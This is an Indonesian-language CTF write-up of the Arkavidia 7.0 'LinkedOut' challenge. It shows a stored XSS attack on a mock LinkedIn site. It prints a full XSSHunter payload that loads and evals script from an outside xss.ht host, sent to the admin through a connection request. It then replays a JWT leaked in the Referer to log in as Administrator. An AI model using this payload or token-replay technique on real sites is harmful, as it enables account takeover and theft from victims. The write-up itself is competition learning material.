[Arkavidia 7.0] LinkedOut

Diberikan soal dan sebuah website saingan dari LinkedIn

Dilihat dari deskripsi soalnya, sepertinya terdapat celah Cross Site Scripting (XSS) yang harus dimanfaatkan untuk mendapatkan flag. Sebelum log in ke dalam website, kita harus register terlebih dahulu.

Saat dilakukan register dengan username admin terdapat error username tersebut sudah diambil. padahal soal baru keluar banget dan langsung gas register, tapi udah taken :(.

Nah, disini saya ansumsikan admin adalah target yang harus kita capai untuk mendapatkan flag.

Setelah kita log in kita dapat melakukan beberapa aksi, seperti Posting dan request Connection dengan account lain seperti di LinkedIn

Di sini saya langsung straight test ke admin dengan mengirimkan payload XSS dari xsshunter

Apa itu XSSHunter?

Intinya XSSHunter adalah sebuah tools online gratis yang biasanya digunakan orang untuk mengexploitasi berbagai tipe XSS. XSSHunter menyediakan payload XSS yang jika payload tersebut ke-trigger, XSSHunter akan otomatis mengumpulkan informasi seperti IP korban, Screenshoot saat dibuka, HTML codes dari halaman yang dibuka dan sebagainya.
Baca selengkapnya di https://xsshunter.com/features

Payload dari XSSHunter

<script>
  function b(){
    eval(this.responseText)
  };
  a=new XMLHttpRequest();
  a.addEventListener("load", b);
  a.open("GET", "//tesxxxxxx1023.xss.ht");
  a.send();
</script>

Lalu kita tinggal buat Connection Request ke admin dengan isi pesan XSS payload tersebut.

Tunggu di XSSHunter sambil di refresh-refresh manja.

Setelah masuk ke XSSHunter lalu saya melakukan pengecekan. Tetapi flag tidak muncul pada HTML code seperti soal-soal biasanya. Tetapi ada satu yang menarik perhatian saya yaitu pada Referer.

Pada Referer terdapat auth.php dengan JWT token pada parameter code. Lalu saya coba akses pada website LinkedOut tadi.

Dan boom 😎 GG gaming. Disaat akses, page akan otomatis ke redirect ke index.php yang nantinya kita akan masuk sebagai Administrator.